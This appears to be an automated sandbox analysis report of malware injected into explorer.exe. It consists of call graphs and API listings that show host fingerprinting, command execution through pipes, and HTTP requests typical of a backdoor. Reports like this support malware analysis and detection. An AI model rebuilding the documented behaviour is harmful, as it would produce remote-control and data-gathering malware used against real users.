4463->4464 4465 f2297e 4463->4465 4464->4465 4468 f2267f 4464->4468 4465->4297 4466 f22963 Process32Next 4466->4465 4466->4468 4467 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4467->4468 4468->4466 4468->4467 4469 f2279f wsprintfA 4468->4469 4470 f2be64 3 API calls 4469->4470 4472 f227cf 4470->4472 4471 f2be64 3 API calls 4471->4472 4472->4471 4473 f22839 wsprintfA 4472->4473 4474 f2be64 3 API calls 4473->4474 4477 f22869 4474->4477 4475 f2260c 3 API calls 4475->4477 4476 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4476->4477 4477->4475 4477->4476 4478 f2be64 3 API calls 4477->4478 4478->4466 4480 f2b470 4479->4480 4481 f283b2 SHGetFolderPathA 4480->4481 4482 f283db 4481->4482 4483 f2bfc0 NtAllocateVirtualMemory 4482->4483 4484 f283e7 4483->4484 4485 f283f4 4484->4485 4486 f2be64 3 API calls 4484->4486 4485->4308 4486->4485 4488 f2c7ef 4487->4488 4489 f28033 4487->4489 4490 f2b388 NtAllocateVirtualMemory 4488->4490 4489->4341 4490->4489 4492 f24411 4491->4492 4493 f2bfc0 NtAllocateVirtualMemory 4492->4493 4497 f24444 4493->4497 4494 f24451 4495 f244a4 4496 f282b4 NtFreeVirtualMemory 4495->4496 4496->4494 4497->4494 4497->4495 4498 f2448f MessageBoxA 4497->4498 4498->4495 4579 f2bb44 4580 f2bbc5 4579->4580 4581 f2bb62 4579->4581 4582 f2bb8e CreateFileMappingA 4581->4582 4582->4580 4583 f2bbcc MapViewOfFile 4582->4583 4583->4580 4585 f2bbff 4583->4585 4584 f2bcd5 VirtualFree 4586 f282b4 NtFreeVirtualMemory 4584->4586 4585->4584 4587 f2b388 NtAllocateVirtualMemory 4585->4587 4588 f2bd06 UnmapViewOfFile CloseHandle 4586->4588 4589 f2bc35 4587->4589 4588->4580 4590 f2be64 3 API calls 4589->4590 4591 f2bc87 4590->4591 4592 f2be64 3 API calls 4591->4592 4593 f2bc99 4592->4593 4594 f2bfc0 NtAllocateVirtualMemory 4593->4594 4595 f2bcaf 4594->4595 4596 f282b4 NtFreeVirtualMemory 4595->4596 4597 f2bccb 4596->4597 4598 f282b4 NtFreeVirtualMemory 4597->4598 4598->4584 4638 f24384 4639 f243a7 4638->4639 4640 f243a5 4638->4640 4641 f243c4 
129 API calls 4639->4641 4641->4640 4642 f23304 4643 f23349 4642->4643 4701 f23322 4642->4701 4644 f2b388 NtAllocateVirtualMemory 4643->4644 4645 f23353 4644->4645 4645->4701 4760 f22164 4645->4760 4647 f23406 4648 f22164 21 API calls 4647->4648 4649 f2349e 4648->4649 4650 f22164 21 API calls 4649->4650 4651 f23537 4650->4651 4652 f22164 21 API calls 4651->4652 4653 f235d0 4652->4653 4654 f22164 21 API calls 4653->4654 4655 f23669 4654->4655 4656 f22164 21 API calls 4655->4656 4657 f23702 4656->4657 4658 f22164 21 API calls 4657->4658 4659 f2379b 4658->4659 4660 f22164 21 API calls 4659->4660 4661 f23834 4660->4661 4662 f22164 21 API calls 4661->4662 4663 f238cd 4662->4663 4664 f22164 21 API calls 4663->4664 4665 f23966 4664->4665 4666 f22164 21 API calls 4665->4666 4667 f239ff 4666->4667 4668 f2b388 NtAllocateVirtualMemory 4667->4668 4669 f23a12 4668->4669 4670 f23ad6 4669->4670 4671 f26fc0 NtAllocateVirtualMemory 4669->4671 4669->4701 4672 f26fc0 NtAllocateVirtualMemory 4670->4672 4673 f23b77 4670->4673 4680 f23a63 4671->4680 4682 f23b04 4672->4682 4674 f26fc0 NtAllocateVirtualMemory 4673->4674 4675 f23c18 4673->4675 4684 f23ba5 4674->4684 4676 f26fc0 NtAllocateVirtualMemory 4675->4676 4677 f23cb9 4675->4677 4690 f23c46 4676->4690 4678 f23d5a 4677->4678 4679 f26fc0 NtAllocateVirtualMemory 4677->4679 4681 f23dfb 4678->4681 4683 f26fc0 NtAllocateVirtualMemory 4678->4683 4693 f23ce7 4679->4693 4680->4670 4689 f2be64 3 API calls 4680->4689 4685 f26fc0 NtAllocateVirtualMemory 4681->4685 4686 f23e9c 4681->4686 4682->4673 4697 f2be64 3 API calls 4682->4697 4703 f23d88 4683->4703 4684->4675 4699 f2be64 3 API calls 4684->4699 4705 f23e29 4685->4705 4687 f23f3d 4686->4687 4691 f26fc0 NtAllocateVirtualMemory 4686->4691 4692 f26fc0 NtAllocateVirtualMemory 4687->4692 4696 f23fde 4687->4696 4688 f24138 4782 f22988 4688->4782 4694 f23abd 4689->4694 4690->4677 4709 f2be64 3 API calls 4690->4709 4716 f23eca 4691->4716 4720 f23f6b 4692->4720 4693->4678 4713 f2be64 3 API calls 
4693->4713 4700 f2be64 3 API calls 4694->4700 4698 f2408b 4696->4698 4702 f26fc0 NtAllocateVirtualMemory 4696->4702 4704 f23b5e 4697->4704 4698->4688 4706 f26fc0 NtAllocateVirtualMemory 4698->4706 4707 f23bff 4699->4707 4708 f23acc 4700->4708 4723 f2400c 4702->4723 4703->4681 4717 f2be64 3 API calls 4703->4717 4710 f2be64 3 API calls 4704->4710 4705->4686 4726 f2be64 3 API calls 4705->4726 4732 f240b9 4706->4732 4714 f2be64 3 API calls 4707->4714 4715 f282b4 NtFreeVirtualMemory 4708->4715 4711 f23ca0 4709->4711 4712 f23b6d 4710->4712 4718 f2be64 3 API calls 4711->4718 4719 f282b4 NtFreeVirtualMemory 4712->4719 4721 f23d41 4713->4721 4722 f23c0e 4714->4722 4715->4670 4716->4687 4729 f2be64 3 API calls 4716->4729 4724 f23de2 4717->4724 4725 f23caf 4718->4725 4719->4673 4720->4696 4737 f2be64 3 API calls 4720->4737 4727 f2be64 3 API calls 4721->4727 4728 f282b4 NtFreeVirtualMemory 4722->4728 4723->4698 4740 f2be64 3 API calls 4723->4740 4730 f2be64 3 API calls 4724->4730 4731 f282b4 NtFreeVirtualMemory 4725->4731 4733 f23e83 4726->4733 4734 f23d50 4727->4734 4728->4675 4735 f23f24 4729->4735 4736 f23df1 4730->4736 4731->4677 4732->4688 4747 f2be64 3 API calls 4732->4747 4738 f2be64 3 API calls 4733->4738 4739 f282b4 NtFreeVirtualMemory 4734->4739 4741 f2be64 3 API calls 4735->4741 4742 f282b4 NtFreeVirtualMemory 4736->4742 4743 f23fc5 4737->4743 4744 f23e92 4738->4744 4739->4678 4745 f2406c 4740->4745 4746 f23f33 4741->4746 4742->4681 4748 f2be64 3 API calls 4743->4748 4749 f282b4 NtFreeVirtualMemory 4744->4749 4750 f2be64 3 API calls 4745->4750 4751 f282b4 NtFreeVirtualMemory 4746->4751 4752 f24119 4747->4752 4753 f23fd4 4748->4753 4749->4686 4754 f2407e 4750->4754 4751->4687 4755 f2be64 3 API calls 4752->4755 4756 f282b4 NtFreeVirtualMemory 4753->4756 4757 f282b4 NtFreeVirtualMemory 4754->4757 4758 f2412b 4755->4758 4756->4696 4757->4698 4759 f282b4 NtFreeVirtualMemory 4758->4759 4759->4688 4761 f221e4 4760->4761 4762 f221f6 6 API calls 4761->4762 4808 f22134 
4762->4808 4764 f22333 CreateProcessW 4765 f2b388 NtAllocateVirtualMemory 4764->4765 4766 f22399 4765->4766 4767 f2b388 NtAllocateVirtualMemory 4766->4767 4775 f223d6 4767->4775 4768 f225e8 4771 f225fa 4768->4771 4772 f282b4 NtFreeVirtualMemory 4768->4772 4769 f225a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4769->4768 4770 f22401 PeekNamedPipe 4773 f224b9 PeekNamedPipe 4770->4773 4770->4775 4771->4647 4772->4771 4774 f22569 GetExitCodeProcess 4773->4774 4773->4775 4774->4775 4776 f2258f 4774->4776 4775->4768 4775->4769 4775->4770 4775->4773 4775->4774 4778 f22468 ReadFile 4775->4778 4780 f22518 ReadFile 4775->4780 4809 f2c704 NtDelayExecution 4775->4809 4776->4769 4779 f2be64 3 API calls 4778->4779 4779->4773 4781 f2be64 3 API calls 4780->4781 4781->4774 4783 f22b17 4782->4783 4784 f2299d 4782->4784 4783->4701 4784->4783 4785 f229ca 4784->4785 4786 f282b4 NtFreeVirtualMemory 4784->4786 4787 f229ea 4785->4787 4788 f282b4 NtFreeVirtualMemory 4785->4788 4786->4785 4789 f22a0a 4787->4789 4791 f282b4 NtFreeVirtualMemory 4787->4791 4788->4787 4790 f22a2a 4789->4790 4792 f282b4 NtFreeVirtualMemory 4789->4792 4793 f22a4a 4790->4793 4794 f282b4 NtFreeVirtualMemory 4790->4794 4791->4789 4792->4790 4795 f22a6a 4793->4795 4796 f282b4 NtFreeVirtualMemory 4793->4796 4794->4793 4797 f22a8a 4795->4797 4798 f282b4 NtFreeVirtualMemory 4795->4798 4796->4795 4799 f22aaa 4797->4799 4800 f282b4 NtFreeVirtualMemory 4797->4800 4798->4797 4801 f22aca 4799->4801 4802 f282b4 NtFreeVirtualMemory 4799->4802 4800->4799 4803 f22aea 4801->4803 4804 f282b4 NtFreeVirtualMemory 4801->4804 4802->4801 4805 f22b0a 4803->4805 4806 f282b4 NtFreeVirtualMemory 4803->4806 4804->4803 4807 f282b4 NtFreeVirtualMemory 4805->4807 4806->4805 4807->4783 4808->4764 4809->4775 4522 f2696b 4528 f25b7a new[] 4522->4528 4523 f269a2 GetExitCodeThread 4523->4528 4524 f269de GetExitCodeThread 4524->4528 4525 f25ba7 4526 f2c704 NtDelayExecution 4526->4528 4527 f25484 3 API calls 4527->4528 
4528->4523 4528->4524 4528->4525 4528->4526 4528->4527 4529 f2bfc0 NtAllocateVirtualMemory 4528->4529 4530 f26404 wsprintfA 4528->4530 4531 f26025 wsprintfA 4528->4531 4532 f25f36 wsprintfA 4528->4532 4533 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4528->4533 4534 f28424 11 API calls 4528->4534 4535 f2b770 NtAllocateVirtualMemory 4528->4535 4536 f2b388 NtAllocateVirtualMemory 4528->4536 4537 f2b388 NtAllocateVirtualMemory 4528->4537 4541 f2b388 NtAllocateVirtualMemory 4528->4541 4544 f26fc0 NtAllocateVirtualMemory 4528->4544 4546 f282b4 NtFreeVirtualMemory 4528->4546 4547 f24e28 14 API calls 4528->4547 4548 f28bdc GetCursorPos GetTickCount RtlRandom 4528->4548 4549 f26cfc NtAllocateVirtualMemory 4528->4549 4550 f2b388 NtAllocateVirtualMemory 4528->4550 4551 f25734 73 API calls 4528->4551 4529->4528 4530->4528 4531->4528 4532->4528 4533->4528 4534->4528 4535->4528 4538 f26187 WideCharToMultiByte 4536->4538 4539 f26243 WideCharToMultiByte 4537->4539 4540 f2be64 3 API calls 4538->4540 4543 f2be64 3 API calls 4539->4543 4540->4528 4542 f262ff WideCharToMultiByte 4541->4542 4545 f2be64 3 API calls 4542->4545 4543->4528 4544->4528 4545->4528 4546->4528 4547->4528 4548->4528 4549->4528 4550->4528 4551->4528 4608 f2922b 4609 f29086 4608->4609 4610 f2904b InternetOpenW 4608->4610 4612 f29248 4609->4612 4613 f2923d InternetCloseHandle 4609->4613 4610->4609 4611 f2908b 4610->4611 4616 f255dc 3 API calls 4611->4616 4614 f29250 InternetCloseHandle 4612->4614 4615 f2925b 4612->4615 4613->4612 4614->4615 4617 f290ca 4616->4617 4617->4609 4618 f290f4 4617->4618 4619 f2c860 8 API calls 4617->4619 4620 f29106 4618->4620 4621 f282b4 NtFreeVirtualMemory 4618->4621 4619->4618 4622 f29118 InternetOpenUrlW 4620->4622 4623 f282b4 NtFreeVirtualMemory 4620->4623 4621->4620 4622->4609 4627 f29154 4622->4627 4623->4622 4624 f2915f InternetReadFile 4624->4627 4625 f2b648 3 API calls 4625->4627 4626 f2b388 NtAllocateVirtualMemory 4626->4627 4627->4609 4627->4624 4627->4625 
4627->4626 4499 f28a58 4500 f28a79 4499->4500 4502 f28a72 4499->4502 4501 f28b63 GetProcAddress GetProcAddressForCaller 4500->4501 4500->4502 4501->4502 4599 f244b8 4602 f243c4 4599->4602 4603 f241b4 129 API calls 4602->4603 4604 f243cd 4603->4604 4605 f243eb 4604->4605 4607 f2c704 NtDelayExecution 4604->4607 4607->4604 4628 f27528 4629 f27548 4628->4629 4630 f2754f 4628->4630 4630->4629 4631 f26fc0 NtAllocateVirtualMemory 4630->4631 4632 f276a7 4631->4632 4634 f2c734 4632->4634 4635 f2c74f 4634->4635 4637 f2c74a 4634->4637 4636 f2b388 NtAllocateVirtualMemory 4635->4636 4636->4637 4637->4629 4552 f2b86c 4553 f2b880 4552->4553 4554 f2b8c6 4552->4554 4555 f2b89e VirtualFree 4553->4555 4556 f282b4 NtFreeVirtualMemory 4555->4556 4556->4554 4503 f2545d 4504 f25265 4503->4504 4514 f253a4 4503->4514 4507 f25315 4504->4507 4508 f25292 4504->4508 4505 f25479 4506 f282b4 NtFreeVirtualMemory 4506->4505 4509 f2532e HttpOpenRequestA 4507->4509 4510 f252ab HttpOpenRequestA 4508->4510 4513 f2539c 4509->4513 4510->4513 4513->4514 4515 f253b3 InternetSetOptionA 4513->4515 4516 f253d6 4513->4516 4514->4505 4514->4506 4515->4516 4517 f25424 HttpSendRequestA 4516->4517 4520 f253e0 4516->4520 4518 f25443 4517->4518 4518->4514 4519 f282b4 NtFreeVirtualMemory 4518->4519 4519->4514 4521 f253fb HttpSendRequestA 4520->4521 4521->4518

Control-flow Graph

APIs
  • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
• GetAdaptersInfo.IPHLPAPI ref: 00F28470
• GetAdaptersInfo.IPHLPAPI ref: 00F284A7
• wsprintfA.USER32 ref: 00F284F0
• wsprintfA.USER32 ref: 00F285DB
• wsprintfA.USER32 ref: 00F2863F
Strings
Memory Dump Source
• Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
Similarity
• API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2074107575-252678980
• Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction ID: 26c7a4bb3474f26ae5366b550e63056d6add382a1a4a5f4152b24df15d517149
• Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction Fuzzy Hash: 07A11D3220AB9586DB70DB15F49036AB7A0F788794F540526EACE83B69DF3CC645DF40

Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 162 f27274-f272ab GetAdaptersInfo 163 f272f8-f272fe 162->163 164 f272ad-f272cd call f2b388 GetAdaptersInfo 162->164 166 f27300-f27305 call f282b4 163->166 167 f2730a 163->167 171 f272d1-f272dd 164->171 166->167 170 f2730f-f27313 167->170 172 f272e3-f272f6 171->172 173 f272df-f272e1 171->173 172->163 172->171 173->170
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F2729C
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F272C7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID: o
                                                                                                                                                                                                                                                  • API String ID: 2718687846-252678980

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 174 f28d3c-f28d6c call f2b470 GetUserNameA 177 f28d87-f28d95 174->177 178 f28d6e-f28d81 wsprintfA 174->178 178->177
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameUserwsprintf
                                                                                                                                                                                                                                                  • String ID: frontdesk
                                                                                                                                                                                                                                                  • API String ID: 54179028-1081972030

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 179 f2a8e0-f2a8fb call f28cf0 182 f2a904-f2a918 call f2b4cc 179->182 183 f2a8fd-f2a8ff 179->183 187 f2a926-f2a92b 182->187 188 f2a91a-f2a924 182->188 184 f2aa04-f2aa0b 183->184 189 f2a930-f2a941 call f2bf78 187->189 188->189 192 f2a943-f2a945 189->192 193 f2a94a-f2a983 call f2b470 FindFirstFileW 189->193 192->184 196 f2a9f5-f2a9ff call f282b4 193->196 197 f2a985-f2a98a 193->197 196->184 197->196 199 f2a98c-f2a9a1 FindNextFileW 197->199 201 f2a9a3 199->201 202 f2a9a5-f2a9ab 199->202 201->196 203 f2a9af-f2a9dc call f2c144 call f27430 202->203 204 f2a9ad 202->204 209 f2a9f3 203->209 210 f2a9de-f2a9f1 LoadLibraryW 203->210 204->196 209->197 210->196
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectorySystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2188284642-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 221 f2b388-f2b3c6 NtAllocateVirtualMemory 222 f2b3d7-f2b3e0 221->222 223 f2b3c8-f2b3d2 call f2b470 221->223 223->222
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 2167126740-2766056989

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 243 f25078-f250ba 244 f250bc-f250dc InternetReadFile 243->244 245 f250de-f250e3 244->245 246 f2514f 244->246 245->246 247 f250e5-f25102 call f2b704 245->247 248 f25154-f2515c 246->248 251 f25104-f25106 247->251 252 f25108-f2514a call f2b3e4 247->252 251->248 252->244
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileInternetRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 778332206-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 259 f282b4-f282cc 260 f282ce-f282eb NtFreeVirtualMemory 259->260 261 f282ef-f282f3 259->261 260->261
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3963845541-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 262 f2c704-f2c730 NtDelayExecution
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DelayExecution
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1249177460-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 107 f25160-f251c7 call f2b388 call f2b4cc 112 f251d8-f251e0 107->112 113 f251c9-f251d6 107->113 114 f251e5-f2520d call f2be64 112->114 113->114 117 f25265-f25275 114->117 118 f2520f-f25226 call f2b4cc 114->118 119 f25277-f25280 117->119 120 f25284-f2528c 117->120 127 f25237-f2523f 118->127 128 f25228-f25235 118->128 119->120 122 f25292-f252a9 call f2b4cc 120->122 123 f25315-f2532c call f2b4cc 120->123 135 f252ba-f252c2 122->135 136 f252ab-f252b8 122->136 132 f25340-f25348 123->132 133 f2532e-f2533e 123->133 130 f25244-f2525b call f2be64 127->130 128->130 130->117 141 f25260 call f2be64 130->141 138 f25350-f25397 HttpOpenRequestA 132->138 133->138 137 f252c7-f25310 HttpOpenRequestA 135->137 136->137 140 f2539c-f253a2 137->140 138->140 142 f253a4 140->142 143 f253a9-f253b1 140->143 141->117 144 f25467-f2546d 142->144 145 f253b3-f253d0 InternetSetOptionA 143->145 146 f253d6-f253de 143->146 147 f25479 144->147 148 f2546f-f25474 call f282b4 144->148 145->146 149 f253e0-f25422 call f2c0fc * 2 HttpSendRequestA 146->149 150 f25424-f2543f HttpSendRequestA 146->150 152 f2547b-f25482 147->152 148->147 154 f25443-f25448 149->154 150->154 156 f2544a 154->156 157 f2544c-f2545b call f282b4 154->157 156->144 157->144 157->152
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET ref: 00F25305
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET ref: 00F25391
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET ref: 00F253D0
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00F25418
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00F25439
                                                                                                                                                                                                                                                    • Part of subcall function 00F282B4: NtFreeVirtualMemory.NTDLL ref: 00F282E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2140924187-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 211 f28c30-f28c7b call f2b470 * 2 FindFirstVolumeW 216 f28c81-f28cd8 GetVolumeInformationW FindVolumeClose 211->216 217 f28c7d-f28c7f 211->217 219 f28ce3 216->219 220 f28cda-f28ce1 216->220 218 f28ce5-f28cec 217->218 219->218 220->218
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstVolumeW.KERNEL32 ref: 00F28C6A
                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32 ref: 00F28CBE
                                                                                                                                                                                                                                                  • FindVolumeClose.KERNEL32 ref: 00F28CCD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 586543143-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 225 f28a58-f28a70 226 f28a72-f28a74 225->226 227 f28a79-f28acc 225->227 228 f28bd4-f28bd8 226->228 229 f28ad8-f28ae4 227->229 230 f28bd2 229->230 231 f28aea-f28b41 call f2c0fc call f27430 229->231 230->228 236 f28b47-f28b4d 231->236 237 f28bcd 231->237 236->237 238 f28b4f-f28b57 236->238 237->229 238->237 240 f28b59-f28b61 238->240 241 f28b63-f28b73 GetProcAddress GetProcAddressForCaller 240->241 242 f28b75-f28bcb 240->242 241->242 242->228
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 190572456-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 255 f26c6c-f26ca1 CreateThread 256 f26ca3-f26ca8 255->256 257 f26caa 255->257 258 f26cac-f26cb0 256->258 257->258
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2422867632-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F22233
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F2224D
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F2226E
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F22288
                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32 ref: 00F222A9
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32 ref: 00F222C3
                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00F22385
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 00F22434
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32 ref: 00F22490
                                                                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 00F224E4
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32 ref: 00F22540
                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00F22579
